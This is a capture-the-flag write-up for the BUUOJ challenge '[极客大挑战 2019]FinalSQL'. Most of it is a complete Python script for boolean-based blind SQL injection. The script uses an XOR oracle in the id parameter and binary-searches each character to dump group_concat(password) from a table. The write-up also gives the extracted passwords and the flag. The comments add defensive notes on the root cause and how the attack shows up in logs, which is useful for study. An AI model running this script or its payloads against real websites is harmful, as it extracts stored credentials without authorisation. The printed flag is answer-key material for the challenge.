[极客大挑战 2019]FinalSQL
仔细查看它的提示,试一试盲注
import requests
import time
# Boolean-based blind SQL injection solver for one BUUOJ instance of the
# challenge named in the title.
# NOTE(review): the page lost all indentation; the nesting below is
# reconstructed from statement order -- confirm against the original post.
#
# Oracle: the `id` parameter is XOR-ed with a comparison. When the comparison
# is true the expression becomes 1^1 = 0 and the page contains 'ERROR'; when it
# is false the expression stays 1 and the normal page is returned. One bit of
# the target string leaks per request.
#
# Defender's view: the root cause is `id` reaching the SQL statement as text.
# Binding it as an integer parameter (or rejecting non-numeric ids) removes the
# oracle. The space-free payload suggests a keyword/whitespace filter is in
# place, which evidently does not stop this (inferred -- the server code is not
# shown). In access logs the run appears as a long series of GETs to search.php
# whose `id` differs only in two integers and contains `ascii(substr(`.
url = 'http://994f19ff-38c7-446e-b200-01d5ce55d8bc.node3.buuoj.cn/search.php'
flag = ''

for pos in range(1, 250):
    # Search window for one character: printable ASCII, upper bound exclusive.
    low, high = 32, 128
    while low < high:
        mid = (low + high) // 2
        # Earlier probe kept from the original script (database name, equality test):
        #payload = 'http://8c7ac1a3-8ac9-4802-ba55-d0463e4683e6.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))=%d)#' %(i,mid)
        query = "?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (pos, mid)
        payload = url + query
        response = requests.get(url=payload)
        if 'ERROR' in response.text:
            # Comparison was true: the character code is above mid.
            low = mid + 1
        else:
            high = mid

    # low == high here, which is the recovered character code.
    code = low
    # 32 is what the search collapses to once `pos` is past the end of the
    # string (every comparison is false); 127 is treated as a stop value too.
    if code in (32, 127):
        break

    flag += chr(code)
    print(flag)
    # Pause after each recovered character to keep the request rate low.
    time.sleep(1)
记得请求一定要慢一点(所以脚本里每跑出一个字符就 sleep 1 秒)
藏得好深:flag 在 group_concat(password) 结果的最后一项
cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{ddc7e779-690e-4e20-bb90-5cc863fdc71b}
For the LichKing !